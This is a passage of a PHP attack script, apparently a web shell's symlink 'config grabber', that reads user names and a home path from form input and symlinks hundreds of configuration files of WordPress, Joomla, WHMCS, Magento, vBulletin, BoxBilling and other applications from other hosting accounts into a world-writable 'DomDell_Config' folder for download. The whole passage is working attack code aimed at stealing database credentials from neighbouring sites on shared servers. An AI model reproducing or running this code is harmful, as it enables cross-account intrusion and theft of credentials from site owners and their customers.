symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Bill/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/bill/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/PURCHASE/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Purchase/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/purchase/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/ACCOUNT/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Account/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/account/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/USER/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/User/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/user/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/CLIENTS/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Clients/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/clients/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/BILLINGS/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Billings/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/billings/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/MY/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/My/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/my/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/secure/whm/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/secure/whmcs/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/panel/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/clientes/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/cliente/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/support/order/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/bb-config.php', $r . $us . '..BoxBilling');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/boxbilling/bb-config.php', $r . $us . '..BoxBilling');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/box/bb-config.php', $r . $us . '..BoxBilling');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/host/bb-config.php', $r . $us . '..BoxBilling');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Host/bb-config.php', $r . $us . '..BoxBilling');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/supportes/bb-config.php', $r . $us . '..BoxBilling');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/support/bb-config.php', $r . $us . '..BoxBilling');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/hosting/bb-config.php', $r . $us . '..BoxBilling');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/cart/bb-config.php', $r . $us . '..BoxBilling');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/order/bb-config.php', $r . $us . '..BoxBilling');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/client/bb-config.php', $r . $us . '..BoxBilling');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/clients/bb-config.php', $r . $us . '..BoxBilling');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/cliente/bb-config.php', $r . $us . '..BoxBilling');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/clientes/bb-config.php', $r . $us . '..BoxBilling');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/billing/bb-config.php', $r . $us . '..BoxBilling');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/billings/bb-config.php', $r . $us . '..BoxBilling');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/my/bb-config.php', $r . $us . '..BoxBilling');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/secure/bb-config.php', $r . $us . '..BoxBilling');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/order/bb-config.php', $r . $us . '..BoxBilling');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/includes/dist-configure.php', $r . $us . '..Zencart');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/zencart/includes/dist-configure.php', $r . $us . '..Zencart');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/products/includes/dist-configure.php', $r . $us . '..Zencart');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/cart/includes/dist-configure.php', $r . $us . '..Zencart');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/shop/includes/dist-configure.php', $r . $us . '..Zencart');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/hostbills/includes/iso4217.php', $r . $us . '..Hostbills');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/host/includes/iso4217.php', $r . $us . '..Hostbills');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Host/includes/iso4217.php', $r . $us . '..Hostbills');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/supportes/includes/iso4217.php', $r . $us . '..Hostbills');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/support/includes/iso4217.php', $r . $us . '..Hostbills');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/hosting/includes/iso4217.php', $r . $us . '..Hostbills');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/cart/includes/iso4217.php', $r . $us . '..Hostbills');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/order/includes/iso4217.php', $r . $us . '..Hostbills');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/client/includes/iso4217.php', $r . $us . '..Hostbills');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/clients/includes/iso4217.php', $r . $us . '..Hostbills');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/cliente/includes/iso4217.php', $r . $us . '..Hostbills');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/clientes/includes/iso4217.php', $r . $us . '..Hostbills');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/billing/includes/iso4217.php', $r . $us . '..Hostbills');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/my/includes/iso4217.php', $r . $us . '..Hostbills');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/secure/includes/iso4217.php', $r . $us . '..Hostbills');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/support/order/includes/iso4217.php', $r . $us . '..Hostbills');
}
?>
<?php
echo "<center>";
echo "<br/>";
echo "<a href='DomDell_Config'>Configuration Files</a>";
echo "</center>";
?>
<?php
}
} else {
if (file_exists("DomDell_Config")) {
echo "<center>";
echo "<br/>";
echo "<a href='DomDell_Config'>Configuration Files</a>";
echo "</center>";
} else {
$dir = mkdir(getcwd() . "/DomDell_Config", 0777);
$usr = explode("\n", $_POST['config2']);
foreach ($usr as $uss) {
$us = trim($uss);
$r = getcwd() . "/DomDell_Config/";
symlink("/" . $_POST['home'] . "/" . $us . "/" . "config.php", $r . $us . "config.php");
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/wp-config.php', $r . $us . '..wp-config');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/admin/inc/config.php', $r . $us . '..wp-config');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/admin/include/config.php', $r . $us . '..wp-config');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/inc/config.php', $r . $us . '..wp-config');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/include/config.php', $r . $us . '..wp-config');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/admin/configuration/config.php', $r . $us . '..wp-config');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/admin/conf/config.php', $r . $us . '..wp-config');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/admin/connect/config.php', $r . $us . '..wp-config');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/connect/config.php', $r . $us . '..wp-config');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/admin/configuration/config.php', $r . $us . '..wp-config');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/admin/db/config.php', $r . $us . '..wp-config');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/wordpress/wp-config.php', $r . $us . '..word-wp');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/blog/wp-config.php', $r . $us . '..wpblog');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/configuration.php', $r . $us . '..joomla-or-whmcs');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/joomla/configuration.php', $r . $us . '..joomla');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/vb/includes/config.php', $r . $us . '..vbinc');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/includes/config.php', $r . $us . '..vb');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/conf_global.php', $r . $us . '..conf_global');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/inc/config.php', $r . $us . '..inc');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/config.php', $r . $us . '..config');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Settings.php', $r . $us . '..Settings');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/sites/default/settings.php', $r . $us . '..sites');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/whm/configuration.php', $r . $us . '..whm');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/whmcs/configuration.php', $r . $us . '..whmcs');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/support/configuration.php', $r . $us . '..supporwhmcs');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/whmc/WHM/configuration.php', $r . $us . '..WHM');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/whm/WHMCS/configuration.php', $r . $us . '..whmc');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/whm/whmcs/configuration.php', $r . $us . '..WHMcs');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/support/configuration.php', $r . $us . '..whmcsupp');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/clients/configuration.php', $r . $us . '..whmcs-cli');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/client/configuration.php', $r . $us . '..whmcs-cl');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/clientes/configuration.php', $r . $us . '..whmcs-CL');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/cliente/configuration.php', $r . $us . '..whmcs-Cl');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/clientsupport/configuration.php', $r . $us . '..whmcs-csup');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/billing/configuration.php', $r . $us . '..whmcs-bill');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/admin/config.php', $r . $us . '..admin-conf');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/config/koneksi.php', $r . $us . '..Lokomedia');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/forum/config.php', $r . $us . '..phpBB');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/sites/default/settings.php', $r . $us . '..Drupal');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/config/settings.inc.php', $r . $us . '..PrestaShop');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/app/etc/local.xml', $r . $us . '..Magento');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/application/config/database.php', $r . $us . '..Ellislab');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/vb/includes/config.php', $r . $us . '..Vbulletin');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/includes/config.php', $r . $us . '..Vbulletin');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/forum/includes/config.php', $r . $us . '..Vbulletin');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/forums/includes/config.php', $r . $us . '..Vbulletin');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/cc/includes/config.php', $r . $us . '..Vbulletin');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/inc/config.php', $r . $us . '..MyBB');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/includes/configure.php', $r . $us . '..OsCommerce');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/shop/includes/configure.php', $r . $us . '..OsCommerce');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/os/includes/configure.php', $r . $us . '..OsCommerce');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/oscom/includes/configure.php', $r . $us . '..OsCommerce');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/products/includes/configure.php', $r . $us . '..OsCommerce');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/cart/includes/configure.php', $r . $us . '..OsCommerce');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/inc/conf_global.php', $r . $us . '..IPB');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/wp/test/wp-config.php', $r . $us . '..Wordpress');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/blog/wp-config.php', $r . $us . '..Wordpress');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/beta/wp-config.php', $r . $us . '..Wordpress');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/portal/wp-config.php', $r . $us . '..Wordpress');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/site/wp-config.php', $r . $us . '..Wordpress');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/wp/wp-config.php', $r . $us . '..Wordpress');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/WP/wp-config.php', $r . $us . '..Wordpress');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/news/wp-config.php', $r . $us . '..Wordpress');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/wordpress/wp-config.php', $r . $us . '..Wordpress');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/test/wp-config.php', $r . $us . '..Wordpress');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/demo/wp-config.php', $r . $us . '..Wordpress');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/home/wp-config.php', $r . $us . '..Wordpress');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/v1/wp-config.php', $r . $us . '..Wordpress');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/v2/wp-config.php', $r . $us . '..Wordpress');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/press/wp-config.php', $r . $us . '..Wordpress');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/new/wp-config.php', $r . $us . '..Wordpress');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/blogs/wp-config.php', $r . $us . '..Wordpress');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/configuration.php', $r . $us . '..Joomla');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/blog/configuration.php', $r . $us . '..Joomla');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/cms/configuration.php', $r . $us . '..Joomla');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/beta/configuration.php', $r . $us . '..Joomla');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/portal/configuration.php', $r . $us . '..Joomla');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/site/configuration.php', $r . $us . '..Joomla');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/main/configuration.php', $r . $us . '..Joomla');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/home/configuration.php', $r . $us . '..Joomla');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/demo/configuration.php', $r . $us . '..Joomla');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/test/configuration.php', $r . $us . '..Joomla');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/v1/configuration.php', $r . $us . '..Joomla');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/v2/configuration.php', $r . $us . '..Joomla');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/joomla/configuration.php', $r . $us . '..Joomla');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/new/configuration.php', $r . $us . '..Joomla');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/WHMCS/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/whmcs1/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Whmcs/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/whmcs/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/whmcs/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/WHMC/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Whmc/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/whmc/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/WHM/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Whm/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/whm/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/HOST/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Host/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/host/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/SUPPORTES/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Supportes/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/supportes/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/domains/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/domain/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Hosting/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/HOSTING/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/hosting/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/CART/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Cart/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/cart/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/ORDER/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Order/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/order/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/CLIENT/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Client/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/client/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/CLIENTAREA/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Clientarea/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/clientarea/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/SUPPORT/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Support/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/support/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/BILLING/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Billing/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/billing/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/BUY/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Buy/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/buy/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/MANAGE/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Manage/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/manage/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/CLIENTSUPPORT/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/ClientSupport/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Clientsupport/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/clientsupport/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/CHECKOUT/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Checkout/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/checkout/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/BILLINGS/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Billings/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/billings/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/BASKET/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Basket/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/basket/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/SECURE/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Secure/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/secure/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/SALES/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Sales/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/sales/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/BILL/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Bill/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/bill/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/PURCHASE/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Purchase/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/purchase/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/ACCOUNT/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Account/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/account/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/USER/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/User/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/user/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/CLIENTS/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Clients/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/clients/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/BILLINGS/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Billings/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/billings/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/MY/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/My/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/my/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/secure/whm/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/secure/whmcs/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/panel/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/clientes/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/cliente/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/support/order/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/bb-config.php', $r . $us . '..BoxBilling');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/boxbilling/bb-config.php', $r . $us . '..BoxBilling');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/box/bb-config.php', $r . $us . '..BoxBilling');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/host/bb-config.php', $r . $us . '..BoxBilling');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Host/bb-config.php', $r . $us . '..BoxBilling');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/supportes/bb-config.php', $r . $us . '..BoxBilling');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/support/bb-config.php', $r . $us . '..BoxBilling');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/hosting/bb-config.php', $r . $us . '..BoxBilling');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/cart/bb-config.php', $r . $us . '..BoxBilling');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/order/bb-config.php', $r . $us . '..BoxBilling');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/client/bb-config.php', $r . $us . '..BoxBilling');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/clients/bb-config.php', $r . $us . '..BoxBilling');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/cliente/bb-config.php', $r . $us . '..BoxBilling');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/clientes/bb-config.php', $r . $us . '..BoxBilling');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/billing/bb-config.php', $r . $us . '..BoxBilling');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/billings/bb-config.php', $r . $us . '..BoxBilling');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/my/bb-config.php', $r . $us . '..BoxBilling');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/secure/bb-config.php', $r . $us . '..BoxBilling');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/order/bb-config.php', $r . $us . '..BoxBilling');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/includes/dist-configure.php', $r . $us . '..Zencart');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/zencart/includes/dist-configure.php', $r . $us . '..Zencart');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/products/includes/dist-configure.php', $r . $us . '..Zencart');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/cart/includes/dist-configure.php', $r . $us . '..Zencart');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/shop/includes/dist-configure.php', $r . $us . '..Zencart');
